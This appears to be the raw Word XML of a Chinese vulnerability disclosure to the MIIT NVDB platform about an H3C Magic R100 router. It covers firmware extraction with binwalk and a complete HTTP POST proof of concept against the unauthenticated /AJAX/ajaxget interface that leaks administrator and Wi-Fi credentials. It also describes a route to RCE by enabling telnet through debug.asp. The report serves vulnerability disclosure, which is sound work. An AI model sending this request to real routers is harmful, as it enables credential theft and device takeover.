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工业和信息化部网络安全威胁和漏洞信息共享平台(NVDB)漏洞附件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="方正黑体简体" w:eastAsia="方正黑体简体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="thick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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6548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t>新华三magicR100存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>信息泄露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漏洞验证过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6548" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="漏洞描述"/>
            <w:bookmarkStart w:id="1" w:name="poc"/>
            <w:r>
              <w:t>漏洞描述</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>存在/AJAX/ajaxget接口可以非授权访问，通过ajaxmsg搭配上aspGetGroup()可以调用读取一些敏感信息登入后台后可以实现RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
            </w:pPr>
            <w:r>
              <w:t>版本：&lt;=MagicR100V100R005</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">&lt;=MagciR100V200R00 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
            </w:pPr>
          </w:p>
          <w:bookmarkEnd w:id="0"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:bookmarkStart w:id="2" w:name="漏洞分析与复现"/>
            <w:r>
              <w:t>漏洞分析与复现</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="2"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="一固件获取和解包"/>
            <w:r>
              <w:t>一、固件获取和解包</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>虽然我有物理机，但是我还是从官网下的更新固件包，</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://download.h3c.com.cn/download.do?id=3342938" \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
              </w:rPr>
              <w:t>https://download.h3c.com.cn/download.do?id=3342938</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
            </w:pPr>
            <w:r>
              <w:t>通过binwalk R100V100R100进行解包,发现可以直接查看到内容，</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ZHEFOX@ZHEFOX-MacOS:~/Desktop$ binwalk R100V100R005.bin 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33280         0x8200          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 4145728 bytes</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>1245184       0x130000        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2269691 bytes, 534 inodes, blocksize: 131072 bytes, created: 2018-01-17 03:54:08</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>使用binwalk -eM R100V100R100进行提取</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ZHEFOX@ZHEFOX-MacOS:~/Desktop$ binwalk -eM R100V100R005.bin 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Scan Time:     2022-03-31 19:12:49</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Target File:   /home/ZHEFOX/Desktop/R100V100R005.bin</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>MD5 Checksum:  42ec9ec3de32216ae2d93ad1ff3a208b</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Signatures:    411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33280         0x8200          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 4145728 bytes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WARNING: Symlink points outside of the extraction directory: /home/ZHEFOX/Desktop/_R100V100R005.bin.extracted/squashfs-root/web -&gt; /var/web; changing link target to /dev/null for security purposes.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WARNING: Symlink points outside of the extraction directory: /home/ZHEFOX/Desktop/_R100V100R005.bin.extracted/squashfs-root/dev/log -&gt; /var/tmp/log; changing link target to /dev/null for security purposes.</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>1245184       0x130000        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2269691 bytes, 534 inodes, blocksize: 131072 bytes, created: 2018-01-17 03:54:08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Scan Time:     2022-03-31 19:12:51</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Target File:   /home/ZHEFOX/Desktop/_R100V100R005.bin.extracted/8200</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>MD5 Checksum:  4b2d56fb09ee2c3feafac6513c01f7c6</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Signatures:    411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0             0x0             uImage header, header size: 64 bytes, header CRC: 0xFB26C18E, created: 2018-01-17 03:51:29, image size: 4145664 bytes, Data Address: 0x80001000, Entry Point: 0x800044B0, data CRC: 0x9E4BD9D4, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: none, image name: "Linux Kernel Image"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3194976       0x30C060        Linux kernel version 2.6.30</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3260544       0x31C080        CRC32 polynomial table, little endian</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3274176       0x31F5C0        SHA256 hash constants, big endian</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3281920       0x321400        CRC32 polynomial table, big endian</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3475335       0x350787        Neighborly text, "neighbor %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3477803       0x35112B        HTML document header</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3477966       0x3511CE        HTML document footer</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3666048       0x37F080        AES S-Box</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>3974025       0x3CA389        Microsoft executable, MS-DOS</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>4145216       0x3F4040        ASCII cpio archive (SVR4 with no CRC), file name: "/dev", file name length: "0x00000005", file size: "0x00000000"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>4145332       0x3F40B4        ASCII cpio archive (SVR4 with no CRC), file name: "/dev/console", file name length: "0x0000000D", file size: "0x00000000"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>4145456       0x3F4130        ASCII cpio archive (SVR4 with no CRC), file name: "/root", file name length: "0x00000006", file size: "0x00000000"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>4145572       0x3F41A4        ASCII cpio archive (SVR4 with no CRC), file name: "TRAILER!!!", file name length: "0x0000000B", file size: "0x00000000"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>成功提取后，进入发现是squashfs架构，在squashfs-root发现了www目录，跟进发现是一个asp网站</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="3"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="二漏洞实现和分析"/>
            <w:r>
              <w:t>二、漏洞实现和分析</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>曾经在攻击该接口时，因为无法改参数无法实现RCE，但是我还在思考到会不会这个接口可以有别利用前途呢，我将服务器的http的binary丢入IDA进行分析查阅。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 366: function AjaxGetWan1State()</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  367  {</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  368      XMLHttpReqtmp = createXMLHttpRequest();</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  369      if (XMLHttpReqtmp)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  370      {</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  371:         var url = "AJAX/ajaxget";</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  372          var msg="ajaxmsg=aspGetGroup(Wan1BasicState)";</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  373          XMLHttpReqtmp.open("POST", url, true);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ...</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  385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 xml:space="preserve"> { // ÐÅÏ¢ÒÑ¾­³É¹¦·µ»Ø£¬¿ªÊ¼´¦ÀíÐÅÏ¢</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  386    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>XMLHttpReq=null;</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  387:   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>setTimeout("AjaxGetWan1State();",2000);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  388           }</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  389           else </w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ...</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  399      if (XMLHttpReq)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  400      {</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  401:         var url = "AJAX/ajaxget";</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  402          var msg="ajaxmsg=aspGetGroup(Wan1Ping)";</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  403          XMLHttpReq.open("POST", url+"?IsVersionCheck=1", true);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>通过已知的可利用接口在IDA直接搜索字符串，并追踪。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706495"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="2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7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交叉引用继续跟进，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884295"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="2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88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5568315"/>
                  <wp:effectExtent l="0" t="0" r="0" b="13335"/>
                  <wp:docPr id="3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556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发现存在很多的接口，这些都是可以调用的函数方法，可以通过此处打印出一些信息，初步尝试打印出了系统的日志文件。</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="4"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="在观察和不断读取泄露信息时发现了自己的wifi账号和密码"/>
            <w:r>
              <w:t>在观察和不断读取泄露信息时，发现了自己的wifi账号和密码！！！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791585"/>
                  <wp:effectExtent l="0" t="0" r="0" b="18415"/>
                  <wp:docPr id="3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79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在这里我们可以看到管理员和访客路由器的账号密码，连接设备等信息，再访问下图接口，可以查看网站管理密码如果和wifi密码一样就是1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162935"/>
                  <wp:effectExtent l="0" t="0" r="0" b="18415"/>
                  <wp:docPr id="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163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bookmarkEnd w:id="5"/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="4"/>
            </w:pPr>
            <w:r>
              <w:t>POC：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>—————————————————————————————————   获取管理员账号密码   ———————————————————————————————————</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>POST /AJAX/ajaxget HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Host: 192.168.124.1</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Content-Length: 78430</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Origin: http://192.168.124.1</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Referer: http://192.168.124.1/AJAX/ajaxget</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Pragma: no-cache</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="16"/>
              </w:rPr>
              <w:t>Cache-Control: no-cache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ajaxmsg=aspGetGroup(process_pppoe_user)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:r>
              <w:t>拿到了密码，我们就可以去访问系统的管理界面，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2141855"/>
                  <wp:effectExtent l="0" t="0" r="0" b="10795"/>
                  <wp:docPr id="4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142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先把讨厌的防御关了，发现该机器存在telnet，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2391410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="4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391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同时发现存在</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.124.1/debug.asp" \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
              </w:rPr>
              <w:t>http://192.168.124.1/debug.asp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="12"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 这个调试网页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6431915"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="4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43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打开Telnet就可以RCE，虽然存在其他RCE方法，但是这个方法最简单。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="14"/>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
          <w:bookmarkEnd w:id="1"/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解决措施：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对接口访问加权限。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</w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3054"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsi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337921673" o:spid="_x0000_s1027" o:spt="136" type="#_x0000_t136" style="position:absolute;left:0pt;height:47pt;width:791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工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）" style="font-family:微软雅黑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7B"/>
    <w:rsid w:val="000B2C5C"/>
    <w:rsid w:val="003C327B"/>
    <w:rsid w:val="004704C1"/>
    <w:rsid w:val="004F7197"/>
    <w:rsid w:val="006138BD"/>
    <w:rsid w:val="008A01BD"/>
    <w:rsid w:val="008E40E3"/>
    <w:rsid w:val="00AD6B12"/>
    <w:rsid w:val="00B17E0C"/>
    <w:rsid w:val="00B2589E"/>
    <w:rsid w:val="00B955DD"/>
    <w:rsid w:val="00C778C2"/>
    <w:rsid w:val="00E03161"/>
    <w:rsid w:val="00E72868"/>
    <w:rsid w:val="11A17E07"/>
    <w:rsid w:val="3338513A"/>
    <w:rsid w:val="35413312"/>
    <w:rsid w:val="4243575B"/>
    <w:rsid w:val="464A7359"/>
    <w:rsid w:val="47B265AF"/>
    <w:rsid w:val="4E7A2E4A"/>
    <w:rsid w:val="56B109C1"/>
    <w:rsid w:val="6151551A"/>
    <w:rsid w:val="694162F9"/>
    <w:rsid w:val="760F7193"/>
    <w:rsid w:val="7B3A236A"/>
    <w:rsid w:val="7F4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paragraph" w:styleId="6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basedOn w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="15"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="16"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="22">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="23"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="23">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="Image Captio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1056</Words>
  <Characters>5270</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6202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2021-10-22T08:48:00Z</dcterms:created>
  <dc:creator>jia_9</dc:creator>
  <cp:lastModifiedBy>[岚冰]EntityHalo(ฅ]ω[*ฅ)</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-07T17:13:46Z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EBE72D4B0383419B8F173EB00CAF3974</vt:lpwstr>
  </property>
</Properties>
</file>